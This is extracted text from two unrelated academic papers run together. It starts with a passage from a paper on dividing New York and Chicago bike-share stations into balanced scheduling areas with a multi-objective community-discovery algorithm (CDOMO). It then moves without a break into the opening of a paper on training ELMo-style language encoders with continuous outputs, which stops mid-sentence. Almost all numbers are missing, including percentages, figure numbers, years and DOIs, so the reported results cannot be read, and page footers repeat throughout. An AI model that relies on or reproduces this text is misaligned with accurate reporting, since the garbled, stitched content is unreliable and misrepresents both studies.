. for the least sites is as follows (eq. ( . )): rij = qij+qji m ( . ) among them, rij represents the similarity between site i and site j; qij represents the number of times to rent a bicycle from site i and site j to return the bicycle; qji represents the number of times of renting a bicycle from site i and returning it at site j; m represents the time range in days. in this experiment, the data set was a total of days in may , so m = .the corresponding abstract network can be generated through the lease-return relationship (fig. ). due to the dense population, dense sites, and prosperous business, the sites in manhattan are more closely linked, and brooklyn is a river is separated from manhattan, so the connection between the two regional sites is sparse except for the leases along the river. experimental result in the experiment, we first used the gephi visualization network analysis platform to analyse the community structure in the data (hu, an & wang, ). the gephi platform uses the integrated fast unfolding algorithm, it divides the public bicycle abstraction network according to the rules of public bicycle rental. the fast unfolding algorithm mainly lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure spatial distribution map of public bicycles in new york. full-size doi: . /peerjcs. /fig- includes two phases. the first phase is known as modularity optimization. the main part is to divide each node into the community, its neighbourhood nodes are located, so that the value of the module degree becomes larger; the second phase is called community. aggregation is mainly to aggregate the communities divided in the first step into one site, that is, to rebuild the network based on the community structure generated in the previous step. repeat the above process, until the structure of the network no longer changes (fig. ). after the fast unfolding algorithm for the new york public bicycle rental site in this paper, fig. shows the internal community structure of the abstract network of new york’s public bicycles, where the dots represent sites, where the sites of different communities are represented by different colours, and the lines represent the relationships between the sites; obviously, six communities have more close contact with leases within the same community, and the links between different societies are relatively sparse. the results of the lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table dataset contains fields, and the nine fields. no. fields meaning start time starting time stop time end time start_station_id bicycle rental site id start_station_name name of bicycle rental site start_station_longitude longitude of rental bicycle rental site start_station_latitude latitude of rental bicycle rental end_station_id return bicycle rental id end_station_name the name of the bicycle rental site end_station_longitude the longitude of the bicycle rental site end_station_latitude the longitude of the bicycle rental site fast unfolding community discovery algorithm are mapped to map on new york (fig. ). manhattan is a densely populated administrative district, and the vast majority of public bicycles in the area ride on the inside, so the manhattan district is divided into five areas according to the law of rent. brooklyn is structured in a district. although the division results are relatively reasonable, there are still many abnormal sites. these abnormal sites are far away from their respective areas; the number of sites of each area is uniform. cdomo is based on community discovery algorithm, considering the regional scheduling workload factors. the regional scheduling workload is determined by estimated dispatch distance and the number of regional least sites. if the community finds out that there are abnormal sites, it will cause regional forecasting scheduling distance become larger, so that the variance between the scheduling distances will become larger. if there is a major difference in the number of sites between areas, the variance between the numbers of sites will increase. the goal of cdomo is to optimize the variance of the distance between the regional scheduling, and optimize the variance of the number of sites. in the optimization process, the division results can be adjusted to make it more reasonable. the division process does not take into consideration the deficiencies in the workload balance in each scheduling area. after the community discovery algorithm based on multi-objective optimization solves the division model of the public bicycle scheduling area, the experimental results shown in fig. are obtained. by comparing the result shows that the sites along the williamsburg bridge and the riverside along manhattan is divided into the same dispatch area, which is more n line with the rules of public bicycle rental and resolving the anomaly (zhang et al., ). the difference between the number of sites and regional sites is too large (manju & fred, ). in order to maintain the consistency of the experiment, the value of k in the classical clustering algorithm k-means algorithm is set to (lin & song, ), and then the clustering is based on the same data set; the space area enclosed by the sites in each class as the scheduling area. in order to achieve regional division, the results of the regional division based on the clustering algorithm (fig. ). it was found that when the clustering number is k= , the clustering algorithm achieves a poor regional division. the number of sites in the class represented by the red is very large, while the number of classes represented by purple lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure abstract network of public bicycles in new york city. full-size doi: . /peerjcs. /fig- and beige is very small, and the number of sites to vary greatly from the types. in addition, the boundaries of each scheduling area are unclear and are overlapped (zhen et al., ). algorithm performance comparison results built on the overall experimental results of the above three methods, it is found that the multi-objective optimization-based community discovery algorithm proposed to this lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure schematic diagram of community discovery algorithm. full-size doi: . /peerjcs. /fig- figure schematic diagram of analysis results of the gephi visual network analysis platform. full-size doi: . /peerjcs. /fig- paper can make the division of the areas consistent with the rules and make the regional scheduling workload as balanced as possible. in addition to the analysis of the overall distribution of provincial division space, the paper also compares and analyses the three lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of fast unfolding community discovery algorithm in the new york dataset. full-size doi: . /peerjcs. /fig- dimensions of the regional rental site variance, the regional dispatch distance variance, and the estimated total dispatch distance. figure compares the variance between the numbers of sites. the data show that the variance between the cdomo compared to the k-means algorithm is reduced by . %, and the variance of the fast unfolding algorithm is reduced by . %. figure compares the variance of the number of bicycles dispatched in the area. the data show that the variance of the cdomo algorithm compared to the k-means algorithm is reduced by . %, and the variance of the fast unfolding algorithm lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on multi-objective optimization algorithm in the new york dataset. full-size doi: . /peerjcs. /fig- lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on clustering algorithm in the new york dataset. full-size doi: . /peerjcs. /fig- is reduced by . %. figure compares the estimated total scheduled distances. the data show that the variance of the cdomo algorithm is . % compared with the k-means algorithm and . % compared to the fast unfolding algorithm. when scheduling and partitioning based on multi-objective optimization algorithm, the estimated scheduling distance can be shortened, and the estimated scheduling distance is positively related to the actual scheduling distance, so the actual scheduling distance will also be shortened; in addition, the scheduling work of each area will also be made. relatively balanced. figure is a comparative display of experimental results. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure difference in the number of bicycle rental points under three algorithms in the new york dataset. full-size doi: . /peerjcs. /fig- figure distance difference of bicycle scheduling area under three algorithms in the new york dataset. full-size doi: . /peerjcs. /fig- chicago public bicycle data set introduction first of all, the data set cited in this paper is from chicago public bicycle data (ye, chu & xu, ). the starting site is - - , and the deadline is - - . there are two quarters and six months of data, a total of , data records. this paper did some data pre-processing: trips that did not include a start or end date were removed from the original table. then, in order to ensure that the information of the data set more abundant, this paper decided to use the data set, distance information of each pair of source address and destination address. finally, we utilize certain data pre-processing methods to remove weather and other data because it can be considered as an ideal condition. the dataset lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure total distance of estimated scheduling under three algorithms in the new york dataset. full-size doi: . /peerjcs. /fig- figure comparison of experimental results of region partition under three algorithms in new york dataset. full-size doi: . /peerjcs. /fig- contains fields, and the fields related to this experiment are presented in the following table . experimental result results of the fast unfolding community discovery algorithm can be mapped to chicago map as the picture shows (ye, chu & xu, ). in contrast, the division results are more uniform and reasonable, but there are too many abnormal sites in the middle. these abnormal sites are a long way from where they should have existed. the number of rental sites in a divided area is not particularly uniform (fig. ). based on cdomo, in the optimization process, the division results are dynamically adjusted in time. therefore, in this case, the division result is more reasonable, and the problem of scheduling balance, this algorithm obviously adds more consideration. it not only addresses the problem of abnormal sites, but also solves the problem of differences in the number of regional sites at the same time (fig. ). in order to make the experiment lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table dataset contains fields, and the fields. no. fields meaning start time day and time trip started, in cst stop time day and time trip ended, in cst from_station_id id of station where trip originated from_station_name name of station where trip originated from_station_longitude longitude of rental bicycle rental site from_station_latitude latitude of rental bicycle rental to_station_id id of station where trip terminated to_station_name name of station where trip terminated to_station_longitude the longitude of the bicycle rental site to_station_latitude the longitude of the bicycle rental site figure results of fast unfolding community discovery algorithm in chicago dataset. full-size doi: . /peerjcs. /fig- lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on multi-objective optimization algorithm in the chicago dataset. full-size doi: . /peerjcs. /fig- consistent, we set the value of k in the k-means algorithm as , and then we clustered the uniform data set. the results of the clustering are presented in the figure. this paper believes that the results obtained by the clustering algorithm are very poor, because the red sites represent a particularly large number of sites. the yellow site represents a particularly small number of rental sites. this shows that the various types of leases, the number of differences is too large, in addition, this algorithm also led to the border is not clear, and there is some inevitable overlap. in the actual scheduling work, this situation is not allowed, as showed in fig. . algorithm performance comparison results this paper will describe the quantified experimental results of the three methods, it compares the differences between them. it is easy to see that the algorithm proposed in lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on clustering algorithm in the chicago dataset. full-size doi: . /peerjcs. /fig- this paper is optimal, compared to the other two algorithms. figure compares the difference between the numbers of sites. compared to the k-means clustering algorithm and the fast unfolding community discovery algorithm, the variance of the cdomo algorithm is reduced by . % and . %. figure in this paper compares the number of scheduled bicycles, it finds that the cdomo algorithm set out in the present paper is an optimal algorithm. similarly, opposed to the k-means clustering algorithm and the fast unfolding community finding algorithm, the variance is reduced by . % and . % (fig. ). figure compares the estimated total distance of scheduling with the other two algorithms, and the conclusion shows that the distance is decreased by . % and . %. then we can conclude that the cdomo algorithm proposed in this paper: it effectively reduces the number of sites; it effectively reduced the variance in the number of bicycles dispatched; it effectively reduced the estimated total distance for scheduling. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure difference in the number of bicycle rental points under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- figure distance difference of bicycle scheduling area under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- conclusion in order to solve the problem of regional division of public bicycles, this paper proposes cdomo. the algorithm fully considers the special law of public bicycle lease/return, and in order to balance the scheduling workload between areas, the regional scheduling workload index is proposed. this problem is identified as a multi-objective optimization problem with two objective functions: minimize the variance between the estimated dispatch distances between each area; minimize the variance between the numbers of sites in each area. the regional scheduling workload can adjust the results of the community discovery algorithm in real time and dynamically. in the end, the results obtained can meet the special rules of public bicycle lease/return, and balance the workload between the areas. the experimental results show that the cdomo can effectively shorten the scheduling lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure total distance of estimated scheduling under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- figure comparison of experimental results of region partition under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- distance of public bicycle system, effectively improve the scheduling efficiency, and make the workload of each scheduling area relatively balanced. the next step is to have a more appropriate solution if you limit the travel time and mileage of the scheduling vehicle. acknowledgements the authors are grateful to the anonymous referee for a careful checking of the details and for helpful comments that improved this paper. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. additional information and declarations funding funding for this work was financially supported by the national natural science foundation of china (no. ) and the key research and development program of zhejiang province, china (grant no. c ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national natural science foundation of china: . key research and development program of zhejiang province, china: c . competing interests the authors declare there are no competing interests. author contributions • fei lin conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • yang yang conceived and designed the experiments, performed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • shihua wang analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • yudi xu performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • hong ma analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft, research funding. • ritai yu performed the experiments, prepared figures and/or tables, approved the final draft. data availability the following information was supplied regarding data availability: the data is available at github: https://github.com/yanncuz/ .git. the new york public bicycle data are available in the citi bike trip histories repository: https://www.citibikenyc.com/system-data and http://datawrapper.dwcdn.net/rrehm/ /. the chicago public bicycle data are available in the divvy data repository: https: //www.divvybikes.com/system-data. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/yanncuz/ .git https://www.citibikenyc.com/system-data http://datawrapper.dwcdn.net/rrehm/ / https://www.divvybikes.com/system-data https://www.divvybikes.com/system-data http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references basch ch, ethan d, zybert p, afzaal s, spillane m, basch ce. . public bicycle sharing in new york city: helmet use behaviour patterns at city bicycles stations. journal of community health ( ): – doi . /s - - -y. dubey pp, borkar p. . review on techniques for traffic jam detection and conges- tion avoidance. in: nd international conference on electronics and communica- tion systems (icecs)—review on techniques for traffic jam detection and congestion avoidance. piscataway: ieee, – . dziauddin mf, powe n, alvanides s. . estimating the effects of light rail transit (lrt) system on residential property values using geographically weighted regression (gwr). applied spatial analysis and policy ( ): – doi . /s - - -z. feng x, zhu fx, liu sc. . label propagation community discovery algorithm based on deepwalk model. computer engineering ( ): – . forma ia, raviv t, tzur m. . a -step math heuristic for the static repositioning problem in bicycle-sharing systems. transportation research part b ( ): – doi . /j.trb. . . . guo c, gong c, xu h, yao z. . queuing game theory based optimal routing scheme for heterogeneous users over space information networks. mathematical problems in engineering : article doi . / / . hartmann tolić i, martinović g, crnjac milić d. . optimization methods in modern transportation systems. tehnicki vjesnik—technical gazette ( ): – . hu x, an s, wang j. . taxi driver’s operation behavior and passengers’ demand analysis based on gps data. journal of advanced transportation : doi . / / . jiang s, guan w, he z, yang l. . exploring the intermodal relationship between taxi and subway in beijing, china. journal of advanced transportation : doi . / / . kim s, jeong ub, lee ky. . multi-objective optimization for mixed-flow pump with blade angle of impeller exit and diffuser inlet. journal of mechanical science and technology ( ): – doi . /s - - - . lin w, song y. . a comparative study on x-ray diffraction mineral quan- titative analysis of two methods in sediments. journal of earth environment ( ): – . long j, szeto wy, huang hj. . a bi-objective turning restriction design problem in urban road networks. european journal of operational research ( ): – doi . /j.ejor. . . . manju vn, fred al. . ac coefficient and k-means cuckoo optimisation algorithm- based segmentation and compression of compound images. iet image processing ( ): – doi . /iet-ipr. . . lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.trb. . . http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /iet-ipr. . http://dx.doi.org/ . /peerj-cs. miranda-bront jj, curcio b, méndez-díaz i, montero a, pousa f, zabala p. . a cluster-first route-second approach for the swap body vehicle routing problem. annals of operations research ( ): – doi . /s - - - . mori t, saito s. . molecular mechanism behind the fast folding/unfolding transi- tions of villain headpiece subdomain: hierarchy and heterogeneity. journal of physical chemistry b : – . pan gq, jun-yi hu, min h. . gis-based logistics distribution area division and its vrp algorithm. journal of dalian maritime university ( ): – . phanikrishnakishore m, madamsetti ak. . attribute level clustering approach to quantitative association rule mining. international journal of computer applications ( ): – . schuijbroek j, hampshire rc, hoeve wjv. . inventory rebalancing and vehicle routing in bicycle sharing systems. european journal of operational research ( ): – . shivach p, nautiyal l, ram m. . applying multi-objective optimization al- gorithms to mechanical engineering. in: ram m, davim j, eds. soft computing techniques and applications in mechanical engineering. hershey: igi global, – doi . / - - - - .ch . shpak m, ni y, lu j, müller p. . variance in estimated pairwise genetic distance un- der high versus low coverage sequencing: the contribution of linkage disequilibrium. theoretical population biology : – . sun w, zhang l, du b. . band selection using improved sparse subspace clustering for hyperspectral imagery classification. ieee journal of selected topics in applied earth observations and remote sensing ( ): – doi . /jstars. . . sun z-y, li y, qu w-c, muhammad t. . unified framework for optimal routing choice under guidance information. complexity : doi . / / . tulabandhula t, bodas t. . method and system for dispatching of vehicles in a public transportation network. united states patent ( ): – . wu t. . research of logistics distribution path planning based on improved nsga-ii. journal of information & computational science ( ): – doi . /jics . xu jm, qin xr, ma yy. . public bicycle multilevel partition scheduling method. jiaotong yunshu xitong gongcheng yu xinxi/ journal of transportation systems engineering and information technology ( ): – . yanping j, decai k, duoning y. . two-sided stable matching decision-making method with ordinal interval preference. systems engineering—theory & practice ( ): – . ye p, chu c, xu l. . ic card-based data mining characteristics of urban public bicycles. in: fifth international conference on transportation engineering. – doi . / . . zhang j, liang y, wei wj. . regional division of public bicycle stations based on improved k-means algorithm. information communication ( ): – . lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . /jstars. . http://dx.doi.org/ . / / http://dx.doi.org/ . /jics http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. zhang w, ge y, yuan b, xu h. . busy line analysis with improved association rules mining algorithm for hangzhou public free-bicycle system. in: intelligent systems. vol. . piscataway: ieee, – . zhen z, xiangqian li, dept s, univ sn. . development and enlightenment of public bicycle sport in chicago. journal of sports adult education ( ): – . lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. efficient contextual representation learning with continuous outputs liunian harold li†, patrick h. chen∗, cho-jui hsieh∗, kai-wei chang∗ †peking university ∗university of california, los angeles liliunian@pku.edu.cn, patrickchen@g.ucla.edu {chohsieh, kwchang}@cs.ucla.edu abstract contextual representation models have achieved great success in improving various downstream natural language processing tasks. however, these language-model-based encoders are dif- ficult to train due to their large parameter size and high computational complexity. by carefully examining the training procedure, we observe that the softmax layer, which pre- dicts a distribution of the target word, often in- duces significant overhead, especially when the vocabulary size is large. therefore, we re- visit the design of the output layer and consider directly predicting the pre-trained embedding of the target word for a given context. when applied to elmo, the proposed approach achieves a -fold speedup and eliminates % trainable parameters while achieving competitive per- formance on downstream tasks. further anal- ysis shows that the approach maintains the speed advantage under various settings, even when the sentence encoder is scaled up. introduction in recent years, text representation learning ap- proaches, such as elmo (peters et al., a), gpt (radford et al., ), bert (devlin et al., ), and gpt- (radford et al., ), have been developed to represent generic contextual information in natural languages by training an encoder with a language model objective on a large unlabelled corpus. during the training process, the encoder is given part of the text and asked to predict the missing pieces. prior studies show that the encoders trained in this way can capture generic contextual information of the input text and improve a variety of downstream tasks significantly. however, training contextual representations is known to be a resource-hungry process. for example, elmo is reported to take about weeks to train on a one-billion-token corpus with a vocabulary of , words using three gpus. this slow training procedure hinders the development cycle, prevents fine-grained param- eter tuning, and makes training contextual repre- sentations inaccessible to the broader community. recent work also raises concerns about the envi- ronmental implications of training such large models (strubell et al., ). in addition, the suc- cess of these models stems from a large amount of data they used. it is challenging, if not impossible, to train a contextual representation model on a larger corpus with tens or hundreds of billions of tokens. in this work, we explore how to accelerate contextual representation learning. we identify the softmax layer as the primary cause of inefficiency. this component takes up a considerable portion of all trainable parameters ( % for elmo) and consumes a huge amount of training time. however, it is often not needed in the final model as the goal of contextual representation learning is to build a generic encoder. therefore, it is rather a waste to allocate extensive computational resources to the softmax layer. inspired by kumar and tsvetkov ( ), we con- sider learning contextual representation models with continuous outputs. in the training process, the contextual encoder is learned by minimizing the distance between its output and a pre-trained target word embedding. the constant time com- plexity and small memory footprint of the output layer perfectly serve our desire to decouple learn- ing contexts and words and devote most com- putational resources to the contextual encoder. in addition, we combine the approach with open- vocabulary word embeddings such that the model can be trained without the need to pre-define a https://github.com/allenai/bilm-tf/ issues/ . transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: luke zettlemoyer. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/allenai/bilm-tf/issues/ https://github.com/allenai/bilm-tf/issues/ https://doi.org/ . /tacl_a_ closed word set as the vocabulary. we also provide an alternative interpretation of learning contextual encoders with continuous outputs that sheds light on how the pre-trained embedding could affect the performance of the model. we conduct a comprehensive empirical study to analyze the proposed approach and several existing methods that are originally proposed to reduce the complexity of the output layer in lan- guage models, such as the adaptive softmax, and the sub-word methods. we incorporate these ap- proaches with elmo and conduct a comprehen- sive study to compare them in terms of training speed and performance on five downstream tasks. we demonstrate that the proposed approach ef- fectively reduces the training time and trainable parameters while maintaining competitive perfor- mance compared with the baselines. our approach also exhibits consistent computational advanxtage under different conditions (e.g., with different vo- cabulary sizes, with different sentence encoders, and with different number of gpus). source code is available athttps://github. com/uclanlp/elmo-c. background and related work contextual representation we review contex- tual representation models from two aspects: how they are trained and how they are used in downstream tasks. cove (mccann et al., ) uses the source lan- guage encoder from a machine translation model as a contextual representation model. peters et al. ( a) advocate for the use of larger unlabelled corpora and proposes elmo, a forward and a back- ward lstm-based (hochreiter and schmidhuber, ) language model, whereas gpt (radford et al., ) and gpt- (radford et al., ) build a language model with the transformer (vaswani et al., ). bert (devlin et al., ) intro- duces the masked language model and provides deep bidirectional representation. there are two existing strategies for applying pre-trained contextual representations to down- stream tasks: ) feature-based and ) fine-tuning. in the feature-based approach, fixed features are extracted from the contextual encoder (e.g., elmo, cove) and inserted as an input into a task-specific model. in the fine-tuning approach, the contextual encoder is designed as a part of the network architecture for downstream tasks, and its parameters are fine-tuned with the down- stream task. bert is designed for the fine-tuning approach but it is also evaluated with the feature- based approach. gpt- is a scaled-up version of gpt and exhibits strong performance under zero-shot settings. speeding up language models training con- siderable efforts have been devoted to accelerat- ing the training process of language models. one line of research focuses on developing faster sequence encoder architectures such as cnn (kim et al., ; dauphin et al., ), qrnn (bradbury et al., ), sru (lei et al., ), and the transformer (vaswani et al., ). these architectures have been extensively used for learning language representations (radford et al., ; devlin et al., ; tang et al., ). another line of work focuses on the large- vocabulary issue, as a large and ever-growing vo- cabulary results in an intractable softmax layer. our work falls into the second line and we review existing solutions in detail. several studies for language modeling focus on directly reducing the complexity of the soft- max layer. following kumar and tsvetkov ( ), we group them into two categories: sampling- based approximations and structural approxima- tions. sampling-based approximations include the sampled softmax (bengio et al., ) and nce (mnih and teh, ). the sampled softmax ap- proximates the normalization term of softmax by sampling a subset of negative targets, and nce replaces the softmax with a binary classifier. on the other hand, structural approximations such as the hierarchical softmax (morin and bengio, ) and the adaptive softmax (grave et al., ), form a structural hierarchy to avoid expensive nor- malization. the adaptive softmax, in particular, groups words in the vocabulary into either a short- list or clusters of rare words. for frequent words, a softmax over the short-list would suffice, which reduces computation and memory usage signifi- cantly. the adaptive softmax has been shown to achieve results close to those of the full softmax while maintaining high gpu efficiency (merity et al., ). regarding contextual representation models, elmo used the sampled softmax and gpt and bert resorted to a subword method. specifi- cally, they used wordpiece (wu et al., ) or bpe (sennrich et al., ) to split the words into downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/uclanlp/elmo-c https://github.com/uclanlp/elmo-c subwords and the language models were trained to take subwords as input and also predict sub- words. this method is efficient and scalable, as the subword vocabulary can be kept small. one potential drawback of these subword-level lan- guage models, however, is that they produce rep- resentations for fragments of words. therefore, it takes extra effort to generate word-level repre- sentations (see the discussion in section . ). the high cost of the softmax layer has also been noted in the sentence representation learning literature. following the success of word vec (mikolov et al., ), methods such as skipthought (kiros et al., ) have been developed to learn distributed sentence representations by predicting the context sentences of a given sentence, which involves sequentially decoding words of the target sentences. jernite et al. ( ) and logeswaran and lee ( ) notice the inefficiency of the softmax layer during decoding and propose to use discriminative instead of generative objectives, eliminating the need for decoding. however, these approaches are not directly applicable to contex- tual representation learning. approach a contextual representation model, at its core, is a language model pre-trained on a large unlabeled corpus. in the following, we review the objective of language models and the architectures of exist- ing contextual representation models. we then introduce the proposed model. language model objective given a set of text sequences as the training corpus, we can construct a collection of word-context pairs (w, c), and the goal of a language model is to predict the word w based on the context c. in a forward language model, the context c is defined as the previous words in the sequence, whereas for a backward language model, the context of a word is defined as the following words. for a masked language model, some words in the input sentence are masked (e.g., replaced by a [mask] token) and the objective is to predict the masked words from the remainder. different contextual representa- tion models optimize different objectives. for example, elmo trains a forward and backward language model and bert trains a masked- language model. model architecture a typical neural language model consists of three parts: ) an input layer, ) a sequence encoder, and ) a softmax layer. given a word-context pair (w, c), the input layer uses a word embedding or a character-cnn model (kim et al., ) to convert the input words in c into word vectors. then the sequence encoder embeds the context into a context vector c ∈ rm using a multi-layer lstm (hochreiter and schmidhuber, ), a gated cnn (dauphin et al., ), or a transformer (vaswani et al., ). the softmax layer then multiplies the context vector c with an output word embedding w ∈ rv ×m and uses a softmax function to produce a conditional distribution p(w|c) over the vocabulary of size v . in a language model, the learning objective l(w, c) for (w, c) is then expressed as: l(w, c) = − log p(w|c) = − log softmax(cw t ) = −c · w + log ∑ w′ exp(c · w′), ( ) where w ∈ rm is a row from w corresponding to the target word w and the second term sums over the vocabulary. after the model is trained, the contextual representations are generated from the latent states of the sequence encoder. for example, elmo combines the hidden states of the lstms to generate contextualized word embedding for each word in a sentence. we refer the reader to peters et al. ( a) for details. note that the size of w and the computational complexity of the second term in eq. ( ) scale linearly to the vocabulary size, v . therefore, when v is large, the softmax layer becomes the speed bottleneck. our approach the scaling issue of softmax also occurs in other language generation and sequence- to-sequence models. in the literature, several ap- proaches have been proposed to approximate the softmax layer or bypass it with a subword method (see section ). recently, kumar and tsvetkov ( ) propose to treat the context vector as con- tinuous outputs and directly minimize the distance the dimension of the original output from the sequence encoder may not match the dimension of the output word embedding. in that case, a projection layer is added after the original sequence encoder to ensure that the two dimensions match. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april between the context vector and the pre-trained word embedding associated with the target word, l(w, c) = d(c, w) ( ) the distance function l could be the l distance ‖c − w‖ , the cosine distance c·w ‖c‖‖w‖ or a prob- abilistic distance metric. we argue that the idea of learning with con- tinuous outputs particularly suits contextual rep- resentation learning. as the goal is to obtain a strong contextual encoder, it makes sense to use a pre-trained output word embedding and decouple learning the contextual encoder and the output embedding. in the remainder of this section, we discuss the computational efficiency of the pro- posed approach and its combination with the open- vocabulary word embedding. we also provide an alternative way to interpret training contextual en- coders with continuous outputs. . computational efficiency the continuous output layer has a reduced arith- metic complexity and trainable parameter size. we illustrate these improvements and how they contribute to reducing the overall training time of a contextual representation model in the following. for comparison, we include the sampled softmax, the adaptive softmax, and the subword method in the discussion. . . learning with continue outputs arithmetic complexity the arithmetic com- plexity (i.e., flops) of evaluating loss with con- tinue outputs (i.e., eq. ) takes o(m), as we only need to calculate the distance between two m-dimensional vectors. the complexity of the sampled softmax is proportional to the number of negative samples per batch. when the vocabulary is huge, a large number of negative samples are needed (jozefowicz et al., ). for the adaptive softmax, the time complexity is determined by the capacities of the short-list and the rare-word clus- ters, which grows sub-linearly to the vocabulary size. the complexity of the subword method is determined by the subword vocabulary size. in contrast, the time spent on the continuous output layer and loss evaluation remains constant with respect to the vocabulary size and is negligible. trainable parameter size the output word embedding usually takes up a huge part of the parameters of a language model. for example, the softmax layer in elmo trained on the one billion word benchmark (chelba et al., ) takes up more than % of the trainable parameters of the entire model. even if an approximation such as the sampled softmax is used, the number of trainable parameters is not reduced. approaches like the adaptive softmax reduce the dimension of softmax embedding for rare words, the trainable parameter size of which is effectively reduced but still remains sizable. for a model trained on the same corpus (grave et al., ), the adaptive softmax still amounts to million parameters whereas the sequence encoder has only around million parameters. on the contrary, we learn a contextual encoder with eq. ( ) using a pre- trained word embedding, reducing the trainable parameters besides the encoder from tens or hun- dreds of millions to zero. . . overall training time we now discuss how the efficiency improvements to the output layer contribute to the reduction of the overall training time, in the context of synchronous stochastic gradient descent training on multiple gpus. in general, the following three factors determine the training time. arithmetic complexity the arithmetic com- plexity of a model includes the complexity of the forward and backward propagation on the in- put layer, the sequence encoder, and the output layer. it also includes the overhead of the opti- mization algorithm such as gradient clipping and model updates. the complexity of this optimiza- tion overhead is often proportional to the number of parameters that need updating. with the con- tinuous output layer, not only the arithmetic com- plexity but also the optimization overhead are reduced. gpu memory consumption the training time is also affected by gpu memory consumption, as less gpu memory consumption leads to larger batch size. for the same amount of data and hard- ware resource, larger batch size means better parallelism and less training time. our approach exhibits small gpu memory footprints, due to reductions of the arithmetic complexity (with fewer intermediate results to keep) and trainable parameter size (with fewer parameters to store). as a result, training with continuous outputs is to times more memory-efficient than with the softmax layer (see section . ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april note that as the output word embedding is fixed, we can keep that embedding in the main memory and only load the required part to the gpu memory. despite the fact that this comes with an overhead of moving part of the output word embedding from cpu to gpu memory at each iteration, the benefit of parallelism often dominates over the communication overhead on mainstream hardware, where the gpu memory is often comparatively limited. we also note that larger batch size may lead to difficulty in opti- mization. several methods have been developed to ease the large-batch training issue (goyal et al., ; you et al., ). we show that these meth- ods are sufficient for resolving the optimization difficulty in our experiment (section ). communication cost to train large neural net- work models, using multiple gpus almost becomes a necessity. in addition, one way to scale up current systems is to increase the number of gpus used. in such cases, the communication cost across gpus needs to be taken into consideration. the cost occurs from synchronizing the parameters and their gradients across gpus, which is proportional to the size of parameters that need to be updated. for the sampled softmax, due to the use of the sparse gradient, the communication cost is pro- portional to the 